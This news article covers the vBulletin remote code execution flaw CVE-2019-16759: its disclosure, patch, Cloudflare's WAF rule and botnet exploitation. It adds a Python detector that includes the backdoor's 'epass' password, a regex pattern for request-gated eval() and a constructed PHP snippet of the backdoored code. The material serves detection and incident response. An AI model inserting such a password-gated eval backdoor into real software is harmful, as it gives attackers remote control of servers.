Update: Six days after an anonymous researcher disclosed a zero-day pre-auth remote code execution vulnerability in vBulletin, Cloudflare has deployed a new rule in its Cloudflare Specials ruleset (rule ID 100166).
The Cloudflare team states, “We assess this vulnerability to be very significant as it has a CVSS score of 9.8/10 and affects 7 out of the 10 key risk areas of the OWASP 2017 Top 10. Protection against common RCE attacks is a standard feature of Cloudflare’s Managed Rulesets.”
Cloudflare customers with Managed Rulesets and Cloudflare Specials can protect themselves against this vulnerability by enabling the WAF Managed Rulesets in the Firewall tab of the Cloudflare dashboard.
Head over to the Cloudflare blog for more details about Cloudflare’s protection against this vulnerability.
On September 23rd, an anonymous researcher published a zero-day pre-authentication remote code execution vulnerability in vBulletin that allows an unauthenticated attacker to execute arbitrary shell commands on any vBulletin server running versions 5.0.0 through 5.5.4. The vulnerability was disclosed on Full Disclosure, a public mailing list. Yesterday, the vBulletin team issued a security patch for the vulnerability, which is now tracked as CVE-2019-16759.
How does the zero-day vulnerability in vBulletin work?
Ryan Seguin, a research engineer at Tenable, explains in his blog that the vulnerability is exploitable in a default vBulletin configuration. An unauthenticated attacker only needs to send a specially crafted HTTP POST request to a vulnerable vBulletin host to execute commands on it. He further states, “These commands would be executed with the permissions of the user account that the vBulletin service is utilizing. Depending on the service user’s permissions, this could allow complete control of a host.”
Another security researcher, Troy Mursch of the Bad Packets security intelligence service, told Ars Technica that attackers are using botnets to actively exploit vulnerable servers. The exploit, Mursch says, modifies includes/vb5/frontend/controller/bbcode.php with the sed command to add a backdoor to the code.
Mursch adds, “This is done by setting a ‘password’ (epass) of 2dmfrb28nu3c6s9j. By doing this, the compromised site will only execute code in the eval function if 2dmfrb28nu3c6s9j is set in future requests sent to the server. This would allow a botnet command-and-control (C2) server to exclusively exploit CVE-2019-16759 and issue commands to the targeted site. The vulnerability itself has been regarded by some as a backdoor.”
In other words, the attackers are not just running one-off commands: they exploit the vulnerability once to plant the backdoor, which locks other attackers out of the same hole and enrols the forum in a list of bots the C2 server can control. Through that backdoor the compromised hosts can then be loaded with further payloads, including DDoS malware, and used to conduct denial-of-service attacks.
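A forum operator who suspects compromise will want to check whether bbcode.php has been tampered with in the way Mursch describes. The following Python check is an added example, not code from the article or from any of the researchers quoted: it scans the source of bbcode.php for the known epass value and, more generally, for any eval() gated on a request-controlled “epass” parameter. The exact shape of the injected condition is an assumption based on Mursch's description, and the two sample file bodies are constructed stand-ins, not real vBulletin source.

```python
import re
from pathlib import Path

# The backdoor described by Bad Packets only runs eval() when this value is
# supplied in the request; it is the campaign-specific indicator.
KNOWN_EPASS = "2dmfrb28nu3c6s9j"

# Generic pattern: a request-controlled "epass" parameter followed, within a
# short distance, by an eval() call. The real sed edit may look different;
# this shape is an assumption, so treat the pattern as a heuristic.
GATED_EVAL_RE = re.compile(
    r"""\$_(?:REQUEST|GET|POST)\s*\[\s*["']epass["']\s*\].{0,200}?eval\s*\(""",
    re.DOTALL,
)


def scan_bbcode_source(source: str) -> list:
    """Return a list of human-readable findings for one bbcode.php body."""
    findings = []
    if KNOWN_EPASS in source:
        findings.append(f"known backdoor marker {KNOWN_EPASS} present")
    for match in GATED_EVAL_RE.finditer(source):
        line_no = source.count("\n", 0, match.start()) + 1
        findings.append(f"eval() gated on request parameter 'epass' at line {line_no}")
    return findings


def scan_bbcode_file(path) -> list:
    """Scan a copy of includes/vb5/frontend/controller/bbcode.php on disk."""
    return scan_bbcode_source(Path(path).read_text(encoding="utf-8", errors="replace"))


# Constructed sample: an unconditional eval($code), standing in for the
# pre-patch, vulnerable-but-not-backdoored file. Not real vBulletin source.
UNPATCHED_SAMPLE = """<?php
class Sample_Bbcode_Controller {
    protected function evalCode($code) {
        ob_start();
        eval($code);
        return ob_get_clean();
    }
}
"""

# Constructed sample: the same eval() wrapped in the epass check that the
# botnet's sed command is reported to insert (assumed shape).
BACKDOORED_SAMPLE = """<?php
class Sample_Bbcode_Controller {
    protected function evalCode($code) {
        ob_start();
        if (isset($_REQUEST["epass"]) && $_REQUEST["epass"] == "2dmfrb28nu3c6s9j") eval($code);
        return ob_get_clean();
    }
}
"""

if __name__ == "__main__":
    for name, body in (("unpatched", UNPATCHED_SAMPLE), ("backdoored", BACKDOORED_SAMPLE)):
        findings = scan_bbcode_source(body)
        print(f"{name}: {findings or ['no backdoor indicators']}")
```

Run scan_bbcode_file() against a copy of the file taken from the forum host (or from a backup, to see when the change first appeared). A hit on either check means the host was already exploited and should be treated as compromised, not merely unpatched: as the article notes, the same backdoor is used to deliver further payloads, so reinstalling bbcode.php alone is not a clean-up.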
It is not yet known whether the anonymous publisher reported the vulnerability to the vBulletin team before disclosing it. Another possibility is that the vBulletin team was unable to produce a timely fix, prompting the researcher to publish the details on Full Disclosure instead. The researcher posted the zero-day from an unnamed email service.
Why is a vulnerability in vBulletin so severe?
vBulletin, a popular web forum software package, has a market share of around 0.1% of all forums running on the internet. Though the percentage looks small, ZDNet reports that a vulnerability in vBulletin can affect billions of internet users, because forums store personal information about their registered users. “While billions of internet sites don’t store any info about users, a handful of online forums could very easily store data on most internet users. Therefore, a market share of 0.1% is actually pretty significant, when we factor in how many users could be registered on these forums.”
Steam, EA, Zynga, NASA, Sony, BodyBuilding.com, the Houston Texans, and the Denver Broncos are among the organizations that run vBulletin.
Yesterday, GreyNoise, a cybersecurity company, tweeted that attackers are actively exploiting this vulnerability against vulnerable forums.
GreyNoise is observing opportunistic exploitation of the recent vBulletin 5.x remote code execution vulnerability (CVE-2019-16759), starting three hours ago from several hundred devices around the Internet. Tags available now.
— GreyNoise Intelligence (@GreyNoiseIO) September 25, 2019
According to Chaouki Bekrar, founder and CEO of the exploit broker Zerodium, the vulnerability has been known for years.
The recent vBulletin pre-auth RCE 0day disclosed by a researcher on full-disclosure looks like a bugdoor, a perfect candidate for @PwnieAwards 2020. Easy to spot and exploit.
Many researchers were selling this exploit for years. @Zerodium customers were aware of it since 3 years
— Chaouki Bekrar (@cBekrar) September 25, 2019
The vBulletin team has issued a patch for CVE-2019-16759 for vBulletin versions 5.5.2, 5.5.3, and 5.5.4. Users running earlier versions of vBulletin 5.x must first upgrade to one of those supported versions in order to apply the patch. vBulletin Cloud has already been updated with the fix.